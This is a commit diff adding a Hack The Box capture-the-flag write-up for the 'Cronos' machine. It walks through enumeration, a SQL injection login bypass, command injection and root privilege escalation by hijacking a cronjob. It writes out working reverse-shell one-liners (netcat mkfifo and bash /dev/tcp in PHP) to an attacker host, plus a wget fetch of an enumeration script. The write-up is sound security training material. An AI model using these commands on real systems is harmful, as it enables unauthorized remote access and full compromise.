add hacking blogposts as they are

2025-05-16 20:37:01 +00:00 · 2025-05-07 01:02:00 +02:00 · 2025-05-07 01:02:00 +02:00 · 325b9c3814
commit 325b9c3814
parent fa65088be1
1904 changed files with 91353 additions and 0 deletions
--- a/Medium/4.md
+++ b/Medium/4.md
@ -0,0 +1,223 @@
+# Cronos Writeup
+
+![](img/4.png)
+
+## Introduction :
+
+Cronos is a medium Linux box released back in march 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+    
+    
+      λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+      → nmap -F 10.10.10.13
+      Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 16:00 GMT
+      Nmap scan report for 10.10.10.13
+      Host is up (0.11s latency).
+      Not shown: 97 filtered ports
+      PORT   STATE SERVICE
+      22/tcp open  ssh
+      53/tcp open  domain
+      80/tcp open  http
+    
+      Nmap done: 1 IP address (1 host up) scanned in 3.35 seconds
+    
+      λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+      → nmap -sCV -p22,53,80 10.10.10.13
+      Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 16:01 GMT
+      Nmap scan report for 10.10.10.13
+      Host is up (0.10s latency).
+    
+      PORT   STATE SERVICE VERSION
+      22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
+      | ssh-hostkey:
+      |   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
+      |   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
+      |_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
+      53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
+      | dns-nsid:
+      |_  bind.version: 9.10.3-P4-Ubuntu
+      80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
+      |_http-server-header: Apache/2.4.18 (Ubuntu)
+      |_http-title: Apache2 Ubuntu Default Page: It works
+      Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+    
+      Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+      Nmap done: 1 IP address (1 host up) scanned in 16.20 seconds
+    
+      λ root [ 10.10.14.20/23 ] [nihilist/_HTB/TenTen]
+      → echo '10.10.10.13 cronos.htb' >> /etc/hosts
+    
+
+## **Part 2 : Getting User Access**
+
+As our nmap scan picked up port 53 running a DNS service, we'll use the host command to list the hosts in the domain :
+    
+    
+      λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+      → host -l cronos.htb 10.10.10.13
+      Using domain server:
+      Name: 10.10.10.13
+      Address: 10.10.10.13#53
+      Aliases:
+    
+      cronos.htb name server ns1.cronos.htb.
+      cronos.htb has address 10.10.10.13
+      admin.cronos.htb has address 10.10.10.13
+      ns1.cronos.htb has address 10.10.10.13
+      www.cronos.htb has address 10.10.10.13
+    
+
+looks like we have 2 additional domain names to add to our /etc/hosts file : 
+    
+    
+      λ root [ 10.10.14.20/23 ] [nihilist/_HTB/TenTen]
+      → echo '10.10.10.13 admin.cronos.htb www.cronos.htb' >> /etc/hosts
+    
+
+` ![](prg/4_001.png)![](prg/4_002.png)
+
+admin.cronos.htb looks interesting, let's see if we can have [sql injection](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) : 
+
+![](prg/4_003.png)![](prg/4_004.png)
+
+and we're in ! we have access to a badly written php script used to ping or traceroute, but we can get code execution as www-data by adding ** & <****command>**. So let's see if we can print out the user flag :
+
+![](prg/4_005.png)
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc, let's first get a reverse shell but to do so, we must first check if netcat is on the box :
+
+![](prg/4_006.png)
+
+now that we know that netcat is on the box we can use this one liner and get a reverse shell, catching the incoming connection with another netcat instance running locally. 
+    
+    
+    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 9002 >/tmp/f
+    
+
+`![](prg/4_007.png)
+
+we hit execute and we get a reverse shell : 
+    
+    
+      λ nihilist [ 10.10.14.20/23 ] [~]
+      → nc -lvnp 9002
+      listening on [any] 9002 ...
+      connect to [10.10.14.20] from (UNKNOWN) [10.10.10.13] 36520
+      /bin/sh: 0: can't access tty; job control turned off
+      $ python -c 'import pty;pty.spawn("/bin/sh")'
+    
+
+Now that we have a TTY Shell, let's see if we can enumerate the machine with Linenum, but to do so we need to know if we can use wget / curl 
+    
+    
+      $ which wget
+      which wget
+      /usr/bin/wget
+      $ which curl
+      which curl
+      /usr/bin/curl
+      $ cd /tmp
+      cd /tmp
+      $ wget http://10.10.14.20:8080/LinEnum.sh && chmod +x LinEnum.sh
+      wget http://10.10.14.20:8080/LinEnum.sh && chmod +x LinEnum.sh
+      --2020-02-21 18:50:39--  http://10.10.14.20:8080/LinEnum.sh
+      Connecting to 10.10.14.20:8080... connected.
+      HTTP request sent, awaiting response... 200 OK
+      Length: 46631 (46K) [text/x-sh]
+      Saving to: 'LinEnum.sh'
+    
+      LinEnum.sh          100%[===================>]  45.54K   222KB/s    in 0.2s
+    
+      2020-02-21 18:50:40 (222 KB/s) - 'LinEnum.sh' saved [46631/46631]
+    
+      $./LinEnum.sh
+    
+
+We can, therefore we execute LinEnum.sh after adding the executing right with chmod and looking at it's output we see that crontab executes a /var/www/laravel/artisan every minute as root.
+    
+    
+      $ ls -lash /var/www/laravel | grep artisan
+    ls -lash /var/www/laravel | grep artisan
+    4.0K -rwxr-xr-x  1 www-data www-data 1.7K Apr  9  2017 artisan
+    
+
+To privesc on the machine, we'll modify the artisan file (which is a php file) to contain a reverse shell, we'll use the same reverse shell named nihilist.php that we used when we did [Popcorn](1.html)
+    
+    
+      λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Cronos]
+    → locate nihilist.php
+    /home/nihilist/_HTB/Bastard/nihilist.php
+    /home/nihilist/_HTB/Networked/nihilist.php.gif
+    /home/nihilist/_HTB/Popcorn/nihilist.php
+    /home/nihilist/_HTB/Popcorn/nihilist.php.gif
+    
+    λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Cronos]
+    → cp /home/nihilist/_HTB/Popcorn/nihilist.php .
+    
+    λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Cronos]
+    → nano nihilist.php
+    
+    
+    
+      #!/usr/bin/env php
+      <****?php
+    exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.20/1234 0>&1'");
+    ?****>
+
+once we're done modifying it , we upload it , wait for cronjob to execute it and get a reverse shell this time as root 
+
+_Terminal 1:_
+    
+    
+      λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Cronos]
+      → python -m SimpleHTTPServer 7070
+      Serving HTTP on 0.0.0.0 port 7070 ...
+    
+    
+
+` _Terminal 2:_
+    
+    
+      $ wget http://10.10.14.20:7070/nihilist.php
+    --2020-02-21 19:05:59--  http://10.10.14.20:7070/nihilist.php
+    Connecting to 10.10.14.20:7070... connected.
+    HTTP request sent, awaiting response... 200 OK
+    Length: 98 [application/octet-stream]
+    Saving to: 'nihilist.php'
+    
+         0K                                                       100% 19.8M=0s
+    
+    2020-02-21 19:05:59 (19.8 MB/s) - 'nihilist.php' saved [98/98]
+    
+    $ cp nihilist.php artisan
+    
+
+` _Terminal 3:_
+    
+    
+      λ nihilist [ 10.10.14.20/23 ] [~/_HTB/Cronos]
+    → nc -lvnp 1234
+    listening on [any] 1234 ...
+    connect to [10.10.14.20] from (UNKNOWN) [10.10.10.13] 40640
+    bash: cannot set terminal process group (1580): Inappropriate ioctl for device
+    bash: no job control in this shell
+    root@cronos:~# cat /root/root.txt
+    cat /root/root.txt
+    17XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+    
+
+And that's it ! we have been able to get a reverse shell as root, and we have been able to print out the contents of the root flag. 
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+![](img/4_graph.png)
+